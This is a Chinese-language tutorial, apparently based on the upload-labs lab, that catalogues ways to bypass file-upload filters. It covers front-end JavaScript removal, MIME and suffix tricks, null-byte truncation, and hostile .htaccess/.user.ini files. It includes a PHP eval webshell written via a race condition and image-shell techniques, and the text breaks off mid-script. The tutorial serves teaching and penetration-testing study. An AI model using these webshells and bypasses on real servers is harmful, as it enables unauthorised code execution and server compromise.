<li><strong>后端验证</strong><br>2.1 <strong>基于 MIME 校验</strong><br>2.1.1 校验 content-type 请求头<br>2.1.2 修改文件后缀<br>2.2 <strong>基于后缀绕过</strong><br>2.2.1 <strong>黑名单验证绕过</strong><br>2.2.1.1 <strong>针对 windows 系统绕过</strong><br>2.2.1.1.1 使用其他可执行并且未限制的后缀名<br>2.2.1.1.2 大小写混合绕过<br>2.2.1.1.3 文件名双写绕过<br>2.2.1.1.4 末尾添加 . 绕过<br>2.2.1.1.5 末尾添加空格绕过<br>2.2.1.1.6 末尾添加 ::$DATA 绕过<br>2.2.1.1.7 00截断上传<br>2.2.1.1.8 上传 .access 文件<br>2.2.1.1.9 条件竞争绕过<br>2.2.1.1.10 上传图片马配合文件解析漏洞绕过<br>2.2.1.2 <strong>针对 linux 系统绕过</strong><br>2.2.1.2.1 使用其他可执行并且未限制的后缀名<br>2.2.1.2.2 文件名双写绕过<br>2.2.1.2.3 00截断上传绕过<br>2.2.1.2.4 上传 .access 文件<br>2.2.1.2.5 条件竞争绕过<br>2.2.1.2.6 上传图片马配合文件解析漏洞绕过<br>2.2.2 <strong>白名单验证绕过</strong><br>2.2.2.1 上传图片马配合文件解析漏洞绕过<br>2.2.2.2 上传 .access 文件绕过<br>2.3 <strong>基于文件内容验证</strong><br>2.3.1 上传图片马配合文件解析漏洞绕过</li>
</ol>
<hr>
<h2 id="1-前端验证"><a href="#1-前端验证" class="headerlink" title="1. 前端验证"></a>1. 前端验证</h2><p>前端验证的概念是与后端验证所区分而来,所谓前端文件验证,即是在文件正式开始上传之前,例如利用 javascript 脚本,对文件进行白名单或黑名单过滤,符合规则即可以向服务器上传,不符合则拒绝上传。</p>
<p>常规的 javascript 限制上传文件后缀代码:</p>
<figure class="highlight js"><table><tr><td class="code"><pre><span class="line"><script language=<span class="string">"JavaScript"</span> type=<span class="string">"text/javascript"</span>></span><br><span class="line"> <span class="keyword">function</span> <span class="title function_">check</span>(<span class="params"></span>) {</span><br><span class="line"> <span class="keyword">var</span> aa = <span class="variable language_">document</span>.<span class="title function_">getElementById</span>(<span class="string">"userfile"</span>).<span class="property">value</span>.<span class="title function_">toLowerCase</span>().<span class="title function_">split</span>(<span class="string">'.'</span>);</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable language_">document</span>.<span class="property">form1</span>.<span class="property">userfile</span>.<span class="property">value</span> == <span class="string">""</span>) {</span><br><span class="line"> <span class="title function_">alert</span>(<span class="string">'图片不能为空!'</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">if</span>(aa[aa.<span class="property">length</span> - <span class="number">1</span>] == <span class="string">'gif'</span> || aa[aa.<span class="property">length</span> - <span class="number">1</span>] == <span class="string">'jpg'</span> || aa[aa.<span class="property">length</span> - <span class="number">1</span>] == <span class="string">'bmp'</span> || aa[aa.<span class="property">length</span> - <span class="number">1</span>] == <span class="string">'png'</span> || aa[aa.<span class="property">length</span> - <span class="number">1</span>] == <span class="string">'jpeg'</span>)</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">var</span> imagSize = <span class="variable language_">document</span>.<span class="title function_">getElementById</span>(<span class="string">"userfile"</span>).<span class="property">files</span>[<span class="number">0</span>].<span class="property">size</span>;</span><br><span class="line"> <span class="title function_">alert</span>(<span class="string">"图片大小:"</span> + imagSize + <span class="string">"B"</span>)</span><br><span class="line"> <span class="keyword">if</span>(imagSize < <span class="number">1024</span> * <span class="number">1024</span> * <span class="number">3</span>)</span><br><span class="line"> <span class="title function_">alert</span>(<span class="string">"图片大小在3M以内,为:"</span> + imagSize / (<span class="number">1024</span> * <span class="number">1024</span>) + <span class="string">"M"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="title function_">alert</span>(<span class="string">'请选择格式为*.jpg、*.gif、*.bmp、*.png、*.jpeg 的图片'</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></script></span><br></pre></td></tr></table></figure>
<h2 id="1-1-修改前端-javascript-文件将限制代码去掉"><a href="#1-1-修改前端-javascript-文件将限制代码去掉" class="headerlink" title="1.1 修改前端 javascript 文件将限制代码去掉"></a>1.1 修改前端 javascript 文件将限制代码去掉</h2><p>虽然使用 javascript 脚本对上传的文件进行里过滤,但是由于 javascript 代码放在前端,这就意味着 javascript 可以在客户端直接被修改,所以我们可以在浏览器直接按“F12”查看页面代码并进行编辑,那么就可以把限制代码改掉。</p>
<h2 id="1-2-传参过程中抓包修改后缀"><a href="#1-2-传参过程中抓包修改后缀" class="headerlink" title="1.2 传参过程中抓包修改后缀"></a>1.2 传参过程中抓包修改后缀</h2><p>可以不修改 javascript 代码,例如制作一个简单的 php webshell ,再将 webshell 的后缀改成符合 javascript 的 png 后缀,上传文件,再使用 burpsuite 抓取数据包(此时文件已经通过了前端 javascript 校验,正准备上传到服务器),将文件后缀再改成 php 文件,此时上传的即时 php 的 webshell ,并且成功绕过前端 javascript 验证。</p>
<blockquote>
<p><strong>Webshell</strong><br>webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。<br>顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。<br>——————By <a href="https://baike.baidu.com/item/WEBSHELL">百度百科</a></p>
</blockquote>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%88%A9%E7%94%A8%E7%BB%95%E8%BF%87%E6%96%B9%E5%BC%8F%E6%80%BB%E7%BB%93/1582511932-510797-upload1-0-20200726140013458.png" alt="img"></p>
<h2 id="1-3-前端禁用-javascript-脚本"><a href="#1-3-前端禁用-javascript-脚本" class="headerlink" title="1.3 前端禁用 javascript 脚本"></a>1.3 前端禁用 javascript 脚本</h2><p>既然是前端 javascript 验证,我们又能修改 javascript 脚本,如果不会修改,那就可以直接把 javascript 全部删掉,这样既没有了 javascript 限制,也不影响上传代码成功执行,即可达到目的。</p>
<h2 id="2-后端验证"><a href="#2-后端验证" class="headerlink" title="2. 后端验证"></a>2. 后端验证</h2><p>后端即是服务器,当文件上传到服务器之后,再进行校验匹配文件是否符合规则,符合则保留,不符合就删除。</p>
<h2 id="2-1-基于-MIME-校验"><a href="#2-1-基于-MIME-校验" class="headerlink" title="2.1 基于 MIME 校验"></a>2.1 基于 MIME 校验</h2><p><strong>什么是MIME?</strong></p>
<blockquote>
<p><strong>MIME && MIME 邮件</strong></p>
<p>MIME, 全称为“Multipurpose Internet Mail Extensions”, 比较确切的中文名称为“多用途互联网邮件扩展”。它是当前广泛应用的一种电子邮件技术规范,基本内容定义于RFC 2045-2049。</p>
<p>自然,MIME邮件就是符合MIME规范的电子邮件,或者说根据MIME规范编码而成的电子邮件。</p>
<p>在MIME出台之前,使用RFC 822只能发送基本的ASCII码文本信息,邮件内容如果要包括二进制文件、声音和动画等,实现起来非常困难。MIME提供了一种可以在邮件中附加多种不同编码文件的方法,弥补了原来的信息格式的不足。实际上不仅仅是邮件编码,现在MIME经成为HTTP协议标准的一个部分。<br>MIME (Multipurpose Internet Mail Extensions) 是描述消息内容类型的因特网标准。</p>
</blockquote>
<p><strong>MIME 类型简介:</strong><br>MIME 消息能包含文本、图像、音频、视频以及其他应用程序专用的数据。<br>官方的 MIME 信息是由 Internet Engineering Task Force (IETF) 在下面的文档中提供的:</p>
<ul>
<li><a href="http://www.rfc-editor.org/rfc/rfc822.txt">RFC-822</a> Standard for ARPA Internet text messages</li>
<li><a href="http://www.rfc-editor.org/rfc/rfc2045.txt">RFC-2045</a> MIME Part 1: Format of Internet Message Bodies</li>
<li><a href="http://www.rfc-editor.org/rfc/rfc2046.txt">RFC-2046</a> MIME Part 2: Media Types</li>
<li><a href="http://www.rfc-editor.org/rfc/rfc2047.txt">RFC-2047</a> MIME Part 3: Header Extensions for Non-ASCII Text</li>
<li><a href="http://www.rfc-editor.org/rfc/rfc2048.txt">RFC-2048</a> MIME Part 4: Registration Procedures</li>
<li><a href="http://www.rfc-editor.org/rfc/rfc2049.txt">RFC-2049</a> MIME Part 5: Conformance Criteria and Examples</li>
</ul>
<p><strong>常见的 MIME 类型:</strong></p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">超文本标记语言文本 .html text/html</span><br><span class="line">xml文档 .xml text/xml</span><br><span class="line">XHTML文档 .xhtml application/xhtml+xml</span><br><span class="line">普通文本 .txt text/plain</span><br><span class="line">RTF文本 .rtf application/rtf</span><br><span class="line">PDF文档 .pdf application/pdf</span><br><span class="line">Microsoft Word文件 .word application/msword</span><br><span class="line">PNG图像 .png image/png</span><br><span class="line">GIF图形 .gif image/gif</span><br><span class="line">JPEG图形 .jpeg,.jpg image/jpeg</span><br><span class="line">au声音文件 .au audio/basic</span><br><span class="line">MIDI音乐文件 mid,.midi audio/midi,audio/x-midi</span><br><span class="line">RealAudio音乐文件 .ra, .ram audio/x-pn-realaudio</span><br><span class="line">MPEG文件 .mpg,.mpeg video/mpeg</span><br><span class="line">AVI文件 .avi video/x-msvideo</span><br><span class="line">GZIP文件 .gz application/x-gzip</span><br><span class="line">TAR文件 .tar application/x-tar</span><br></pre></td></tr></table></figure>
<p>完整的 MIME 格式类型参考:<a href="https://www.w3school.com.cn/media/media_mimeref.asp">https://www.w3school.com.cn/media/media_mimeref.asp</a></p>
<h2 id="2-1-1-校验-content-type-请求头"><a href="#2-1-1-校验-content-type-请求头" class="headerlink" title="2.1.1 校验 content-type 请求头"></a>2.1.1 校验 content-type 请求头</h2><p>当文件上传时利用 MIME 类型匹配文件类型时候符合要求,符合则通过不符合再拒绝。以下是基于 content-type 请求头限制的一部分 php 代码</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$_FILES</span>[<span class="string">'userfile'</span>][<span class="string">'type'</span>] != <span class="string">"image/gif"</span>) <span class="comment">#这里对上传的文件类型进行判断,如果不是image/gif类型便返回错误。</span></span><br><span class="line">{ </span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"Sorry, we only allow uploading GIF images"</span>;</span><br><span class="line"> <span class="keyword">exit</span>;</span><br><span class="line">}</span><br><span class="line"><span class="variable">$uploaddir</span> = <span class="string">'uploads/'</span>;</span><br><span class="line"><span class="variable">$uploadfile</span> = <span class="variable">$uploaddir</span> . <span class="title function_ invoke__">basename</span>(<span class="variable">$_FILES</span>[<span class="string">'userfile'</span>][<span class="string">'name'</span>]);</span><br><span class="line"><span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$_FILES</span>[<span class="string">'userfile'</span>][<span class="string">'tmp_name'</span>], <span class="variable">$uploadfile</span>))</span><br><span class="line">{</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"File is valid, and was successfully uploaded.\n"</span>;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">else</span> </span><br><span class="line">{</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"File uploading failed.\n"</span>;</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<p>像这样的只允许上传 image/gif 格式文件,也就是 gif 格式文件,可以在上传文件是抓包并修改该 MIME 文件类型即可上传成功。</p>
<h2 id="2-1-2-修改文件后缀"><a href="#2-1-2-修改文件后缀" class="headerlink" title="2.1.2 修改文件后缀"></a>2.1.2 修改文件后缀</h2><p>原理与上述一样,不过抓包中修改的位置不同,此处直接抓包修改文件后缀名即可。</p>
<h2 id="2-2-基于后缀绕过"><a href="#2-2-基于后缀绕过" class="headerlink" title="2.2 基于后缀绕过"></a>2.2 基于后缀绕过</h2><p>最容易理解的一种绕过方式,只要可以突破上传点没有限制到的后缀名即可上传成功。<br>举例几种常见的后缀名:</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3"</span><br></pre></td></tr></table></figure>
<p>在测试上传点时,只要上传点忽略了其中一点,我们就可以上传马儿</p>
<p>至于如何知晓哪些后缀没有被限制,可以使用 burpsuite 批量上传来测试后缀名</p>
<p>首先随意抓取一个 request 请求包发送给 intrude:<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%88%A9%E7%94%A8%E7%BB%95%E8%BF%87%E6%96%B9%E5%BC%8F%E6%80%BB%E7%BB%93/1582609077-866053-upload-labs6-3.png" alt="img"><br>接着添加以下 payload 并开始攻击</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">php</span><br><span class="line">php7</span><br><span class="line">php5</span><br><span class="line">php4</span><br><span class="line">php3</span><br><span class="line">php2</span><br><span class="line">php1</span><br><span class="line">html</span><br><span class="line">htm</span><br><span class="line">phtml</span><br><span class="line">pHp</span><br><span class="line">Php</span><br><span class="line">phP</span><br><span class="line">pHp5</span><br><span class="line">pHp4</span><br><span class="line">pHp3</span><br><span class="line">pHp2</span><br><span class="line">pHp1</span><br></pre></td></tr></table></figure>
<p>可以看到除了 response 长度为 5299 的包之外的其他包全部上传成功,知道里那些后缀可以上传之后我们在构造我的的马儿<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%88%A9%E7%94%A8%E7%BB%95%E8%BF%87%E6%96%B9%E5%BC%8F%E6%80%BB%E7%BB%93/1582609253-89688-upload-labs6-4.png" alt="img"></p>
<p>以此来判断哪些后缀可以上传,然后再去构造马儿即可。</p>
<h2 id="2-2-1-黑名单验证绕过"><a href="#2-2-1-黑名单验证绕过" class="headerlink" title="2.2.1 黑名单验证绕过"></a>2.2.1 黑名单验证绕过</h2><blockquote>
<p><strong>黑名单 & 白名单</strong><br>这里的黑名单白名单指在上传点的限制方式,黑名单例如仅拒绝 xxx 格式上传,只要上传的内容不是 xxx 格式,文件均可以上传到服务器,对应的白名单即为仅允许上传 yyy 格式,只要不是 yyy 格式的文件全部拒绝上传。</p>
</blockquote>
<h2 id="2-2-1-1-针对-windows-系统绕过"><a href="#2-2-1-1-针对-windows-系统绕过" class="headerlink" title="2.2.1.1 针对 windows 系统绕过"></a>2.2.1.1 针对 windows 系统绕过</h2><p>上传点的服务器可能是 windows 或者 linux 系统,但是针对不同的操作系统有着不同的可绕过方式,我们先来看针对 windows 服务器的可绕过方式。</p>
<h2 id="2-2-1-1-1-使用其他可执行并且未限制的后缀名"><a href="#2-2-1-1-1-使用其他可执行并且未限制的后缀名" class="headerlink" title="2.2.1.1.1 使用其他可执行并且未限制的后缀名"></a>2.2.1.1.1 使用其他可执行并且未限制的后缀名</h2><p>该上传思路即为“没限制什么后缀就上传什么后缀”,可以使用之前的 burpsuite 测试后缀的方式测试可以上传哪些后缀,再构造相应马儿即可。</p>
<h2 id="2-2-1-1-2-大小写混合绕过"><a href="#2-2-1-1-2-大小写混合绕过" class="headerlink" title="2.2.1.1.2 大小写混合绕过"></a>2.2.1.1.2 大小写混合绕过</h2><p>windows 系统中的特性,文件的文件名大小写组合也可以运行,是不区分大小写的,所以在一些上传点中,例如黑名单禁止 x.php 上传,就可以构造 x.Php 等文件,上传到服务器之后 x.Php 在 windows 系统中仍然会以 php 文件来处理执行。</p>
<h2 id="2-2-1-1-3-文件名双写绕过"><a href="#2-2-1-1-3-文件名双写绕过" class="headerlink" title="2.2.1.1.3 文件名双写绕过"></a>2.2.1.1.3 文件名双写绕过</h2><p>例如这样的限制代码</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$file_name</span> = <span class="title function_ invoke__">str_ireplace</span>(<span class="variable">$deny_ext</span>,<span class="string">""</span>, <span class="variable">$file_name</span>);</span><br></pre></td></tr></table></figure>
<p>直接使用双写绕过就行 x.pphphp ,最后生成 x.php 文件</p>
<h2 id="2-2-1-1-4-末尾添加-绕过"><a href="#2-2-1-1-4-末尾添加-绕过" class="headerlink" title="2.2.1.1.4 末尾添加 . 绕过"></a>2.2.1.1.4 末尾添加 . 绕过</h2><p>在某些环境中可以使用 x.php. 文件绕过上传,文件上传到 windows 服务器后,会根据 windows 特有的机制在保存文件是将文件结尾的 . 去掉,这样既绕过里上传限制,也保存下来里 x.php 文件(结尾加 . 可以与双写或大小写混用,但是仅限 windows 系统)</p>
<h2 id="2-2-1-1-5-末尾添加空格绕过"><a href="#2-2-1-1-5-末尾添加空格绕过" class="headerlink" title="2.2.1.1.5 末尾添加空格绕过"></a>2.2.1.1.5 末尾添加空格绕过</h2><p>上传文件是使用 burpsuite 抓包在结尾处添加空格即可,windows 会在保存文件时将空格去掉。<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%88%A9%E7%94%A8%E7%BB%95%E8%BF%87%E6%96%B9%E5%BC%8F%E6%80%BB%E7%BB%93/1582610313-719923-upload-labs7-2-20200726140000055.png" alt="img"></p>
<h2 id="2-2-1-1-6-末尾添加-DATA-绕过"><a href="#2-2-1-1-6-末尾添加-DATA-绕过" class="headerlink" title="2.2.1.1.6 末尾添加 ::$DATA 绕过"></a>2.2.1.1.6 末尾添加 ::$DATA 绕过</h2><blockquote>
<p><strong>Windows ::$DATA alternate data stream</strong><br>The NTFS file system includes support for alternate data streams. This is not a well known feature and was included, primarily, to provide compatibility with files in the Macintosh file system. Alternate data streams allow files to contain more than one stream of data. Every file has at least one data stream. In Windows, this default data stream is called ::$DATA.</p>
</blockquote>
<p>总结来看 ::$DATA 是 windows 的 NTFS 文件系统中的一种机制,当文件名结尾为 ::$DATA 则触发,但是最终保存下来的文件名是不带 ::$DATA 的,从而绕过黑名单限制上传。</p>
<blockquote>
<p><strong>NTFS</strong><br>NTFS(英語:New Technology File System),是Microsoft公司开发的专用文件系统,从Windows NT 3.1开始成为Windows NT家族的标准文件系统。</p>
<p>NTFS取代FAT(文件分配表)和HPFS(高性能文件系统)并进行一系列改进,例如增强对元数据的支持,使用更高级的数据结构以提升性能、可靠性和磁盘空间利用率,并附带一系列增强功能,如访问控制列表(ACL)和文件系统日志。</p>
</blockquote>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%88%A9%E7%94%A8%E7%BB%95%E8%BF%87%E6%96%B9%E5%BC%8F%E6%80%BB%E7%BB%93/1582686434-63469-upload-labs9-2-20200726135957724.png" alt="img"></p>
<h2 id="2-2-1-1-7-00截断上传"><a href="#2-2-1-1-7-00截断上传" class="headerlink" title="2.2.1.1.7 00截断上传"></a>2.2.1.1.7 00截断上传</h2><blockquote>
<p><strong>00截断</strong><br>无论0x00还是%00,最终被解析后都是一个东西:chr(0)<br>chr()是一个函数,这个函数是用来返回参数所对应的字符的,也就是说,参数是一个ASCII码,返回的值是一个字符,类型为string。</p>
<p>那么chr(0)就很好理解了,对照ASCII码表可以知道,ASCII码为0-127的数字,每个数字对应一个字符,而0对应的就是NUT字符(NULL),也就是空字符,而截断的关键就是这个空字符,当一个字符串中存在空字符的时候,在被解析的时候会导致空字符后面的字符被丢弃。<br>这种情况常出现在ASP程序中,PHP 版本<5.3.4时也会有这个情况,JSP中也会出现。<br>那么就可以知道00截断的原理了,在后缀中插入一个空字符(不是空格),会导致之后的部分被丢弃,而导致绕过的发生。如:在文件1.php.jpg中插入空字符变成:1.php.0x00.jpg中,解析后就会只剩下1.php,而空字符怎么插入的呢?通常我们会用Burp抓包后,在文件名插入一个空格,然后再HEX中找到空格对应的16进制编码“20”,把它改成00(即16进制ASCII码00,对应十进制的0),就可以插入空字符了。PS:这里的空格纯粹只是一个标记符号,便于我们找到位置,其实这里是什么字符都无所谓,只不过空格比较有特异性,方便在HEX中查找位置。</p>
</blockquote>
<p>00截断在 php 环境中需要满足以下要求,二者缺一不可。</p>
<ul>
<li>php 版本小于 5.3.4</li>
<li>php的magic_quotes_gpc为OFF状态</li>
</ul>
<h2 id="2-2-1-1-8-上传-access-文件"><a href="#2-2-1-1-8-上传-access-文件" class="headerlink" title="2.2.1.1.8 上传 .access 文件"></a>2.2.1.1.8 上传 .access 文件</h2><p>这里的 .access 只是一个泛例,具体包括 .htaccess 和 .user.ini 等可造成解析漏洞的文件。</p>
<blockquote>
<p><strong>.htaccess</strong><br>.htaccess文件(或者”分布式配置文件”),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。</p>
</blockquote>
<p>可以编辑一个 .htaccess 文件写入以下内容上传至服务器:</p>
<figure class="highlight nginx"><table><tr><td class="code"><pre><span class="line"><span class="attribute">SetHandler</span> application/x-httpd-php</span><br></pre></td></tr></table></figure>
<p>上传该文件后再上传图片马或其他文件,只要该文件有可执行的 php 代码,就可以执行 php 代码。</p>
<blockquote>
<p><strong>.user.ini</strong> :<br>自 PHP 5.3.0 起,PHP 支持基于每个目录的 .htaccess 风格的 INI 文件。此类文件仅被 CGI/FastCGI SAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果使用 Apache,则用 .htaccess 文件有同样效果。</p>
<p>除了主 php.ini 之外,PHP 还会在每个目录下扫描 INI 文件,从被执行的 PHP 文件所在目录开始一直上升到 web 根目录($_SERVER[‘DOCUMENT_ROOT’] 所指定的)。如果被执行的 PHP 文件在 web 根目录之外,则只扫描该目录。</p>
<p>在 .user.ini 风格的 INI 文件中只有具有 PHP_INI_PERDIR 和 PHP_INI_USER 模式的 INI 设置可被识别。</p>
<p>两个新的 INI 指令,user_ini.filename 和 user_ini.cache_ttl 控制着用户 INI 文件的使用。</p>
<p>user_ini.filename 设定了 PHP 会在每个目录下搜寻的文件名;如果设定为空字符串则 PHP 不会搜寻。默认值是 .user.ini。</p>
<p>user_ini.cache_ttl 控制着重新读取用户 INI 文件的间隔时间。默认是 300 秒(5 分钟)。</p>
</blockquote>
<p>但是想要引发 .user.ini 解析漏洞需要三个前提条件</p>
<ul>
<li>服务器脚本语言为PHP</li>
<li>服务器使用CGI/FastCGI模式</li>
<li>上传目录下要有可执行的php文件</li>
</ul>
<p>先来创建一个 .user.ini 文件并写入一下内容:</p>
<figure class="highlight ini"><table><tr><td class="code"><pre><span class="line"><span class="attr">auto_prepend_file</span>=x.png</span><br></pre></td></tr></table></figure>
<p>上传 .user.ini 后,再上传一个 x.png 文件,此时 x.png 文件只要有符合 php 语言的代码就会执行。</p>
<h2 id="2-2-1-1-9-条件竞争绕过"><a href="#2-2-1-1-9-条件竞争绕过" class="headerlink" title="2.2.1.1.9 条件竞争绕过"></a>2.2.1.1.9 条件竞争绕过</h2><p>竞争条件原理介绍:<br>网站逻辑:</p>
<ol>
<li>网站允许上传任意文件,然后检查上传文件是否包含webshell,如果包含删除该文件。</li>
<li>网站允许上传任意文件,但是如果不是指定类型,那么使用unlink删除文件。</li>
</ol>
<p>在删除之前访问上传的php文件,从而执行上传文件中的php代码。<br>例如:上传文件代码如下</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line"><?php fputs(fopen('shell.php','w'),'<?php @eval($_POST["cmd"])?>');?></span><br></pre></td></tr></table></figure>
<p>先进行文件上传,后进行判断与删除。利用时间差进行webshell上传。</p>
<h2 id="2-2-1-1-10-上传图片马配合文件解析漏洞绕过"><a href="#2-2-1-1-10-上传图片马配合文件解析漏洞绕过" class="headerlink" title="2.2.1.1.10 上传图片马配合文件解析漏洞绕过"></a>2.2.1.1.10 上传图片马配合文件解析漏洞绕过</h2><p>这里介绍两种图片马的制作和使用</p>
<h4 id="第一种:"><a href="#第一种:" class="headerlink" title="第一种:"></a>第一种:</h4><p>比较简单,直接在图片格式的文件中加入 GIF89a 图片标识头(也可以修改hex:47 49 46 38 39 61):</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line">GIF89a</span><br><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="title function_ invoke__">phpinfo</span>();</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<p>将文件保存为 x.gif ,上传都服务器后需要配合文件包含漏洞来执行该代码<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%88%A9%E7%94%A8%E7%BB%95%E8%BF%87%E6%96%B9%E5%BC%8F%E6%80%BB%E7%BB%93/1582775243-466351-upload-labs15-2.png" alt="img"><br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%88%A9%E7%94%A8%E7%BB%95%E8%BF%87%E6%96%B9%E5%BC%8F%E6%80%BB%E7%BB%93/1582775285-902970-upload-labs15-3.png" alt="img"></p>
<blockquote>
<p><strong>文件包含:</strong><br>服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接)。<br>PHP中文件包含函数有以下四种:</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="keyword">require</span>()</span><br><span class="line"><span class="keyword">require_once</span>()</span><br><span class="line"><span class="keyword">include</span>()</span><br><span class="line"><span class="keyword">include_once</span>()</span><br></pre></td></tr></table></figure>
<p>include和require区别主要是,include在包含的过程中如果出现错误,会抛出一个警告,程序继续正常运行;而require函数出现错误的时候,会直接报错并退出程序的执行。</p>
<p>而include_once(),require_once()这两个函数,与前两个的不同之处在于这两个函数只包含一次,适用于在脚本执行期间同一个文件有可能被包括超过一次的情况下,你想确保它只被包括一次以避免函数重定义,变量重新赋值等问题。</p>
<p><strong>产生原因:</strong><br>文件包含函数加载的参数没有经过过滤或者严格的定义,可以被用户控制,包含其他恶意文件,导致了执行了非预期的代码。</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"> <span class="variable">$filename</span> = <span class="variable">$_GET</span>[<span class="string">'filename'</span>];</span><br><span class="line"> <span class="keyword">include</span>(<span class="variable">$filename</span>);</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
</blockquote>
<h4 id="第二种:"><a href="#第二种:" class="headerlink" title="第二种:"></a>第二种:</h4><p>在某些 php 环境中会调用如 gd 库来验证上传是是否是图片文件,即使构造了一个图片文件,只要文件数据不符合图片标识数据,即拒绝上传,所以来看怎么构造一个符合图片标识数据的图片文件。</p>
<p>下列代码,可以制作符合图片标识的图片文件:</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment">//png.php</span></span><br><span class="line"><span class="variable">$p</span> = <span class="keyword">array</span>(<span class="number">0xa3</span>, <span class="number">0x9f</span>, <span class="number">0x67</span>, <span class="number">0xf7</span>, <span class="number">0xe</span>, <span class="number">0x93</span>, <span class="number">0x1b</span>, <span class="number">0x23</span>, <span class="number">0xbe</span>, <span class="number">0x2c</span>, <span class="number">0x8a</span>, <span class="number">0xd0</span>, <span class="number">0x80</span>, <span class="number">0xf9</span>, <span class="number">0xe1</span>, <span class="number">0xae</span>, <span class="number">0x22</span>, <span class="number">0xf6</span>, <span class="number">0xd9</span>, <span class="number">0x43</span>, <span class="number">0x5d</span>, <span class="number">0xfb</span>, <span class="number">0xae</span>, <span class="number">0xcc</span>, <span class="number">0x5a</span>, <span class="number">0x1</span>, <span class="number">0xdc</span>, <span class="number">0x5a</span>, <span class="number">0x1</span>, <span class="number">0xdc</span>, <span class="number">0xa3</span>, <span class="number">0x9f</span>, <span class="number">0x67</span>, <span class="number">0xa5</span>, <span class="number">0xbe</span>, <span class="number">0x5f</span>, <span class="number">0x76</span>, <span class="number">0x74</span>, <span class="number">0x5a</span>, <span class="number">0x4c</span>, <span class="number">0xa1</span>, <span class="number">0x3f</span>, <span class="number">0x7a</span>, <span class="number">0xbf</span>, <span class="number">0x30</span>, <span class="number">0x6b</span>, <span class="number">0x88</span>, <span class="number">0x2d</span>, <span class="number">0x60</span>, <span class="number">0x65</span>, <span class="number">0x7d</span>, <span class="number">0x52</span>, <span class="number">0x9d</span>, <span class="number">0xad</span>, <span class="number">0x88</span>, <span class="number">0xa1</span>, <span class="number">0x66</span>, <span class="number">0x44</span>, <span class="number">0x50</span>, <span class="number">0x33</span>);</span><br><span class="line"><span class="variable">$img</span> = <span class="title function_ invoke__">imagecreatetruecolor</span>(<span class="number">32</span>, <span class="number">32</span>);</span><br><span class="line"><span class="keyword">for</span> (<span class="variable">$y</span> = <span class="number">0</span>; <span class="variable">$y</span> < <span class="title function_ invoke__">sizeof</span>(<span class="variable">$p</span>); <span class="variable">$y</span> += <span class="number">3</span>) {</span><br><span class="line"> <span class="variable">$r</span> = <span class="variable">$p</span>[<span class="variable">$y</span>];</span><br><span class="line"> <span class="variable">$g</span> = <span class="variable">$p</span>[<span class="variable">$y</span>+<span class="number">1</span>];</span><br><span class="line"> <span class="variable">$b</span> = <span class="variable">$p</span>[<span class="variable">$y</span>+<span class="number">2</span>];</span><br><span class="line"> <span class="variable">$color</span> = <span class="title function_ invoke__">imagecolorallocate</span>(<span 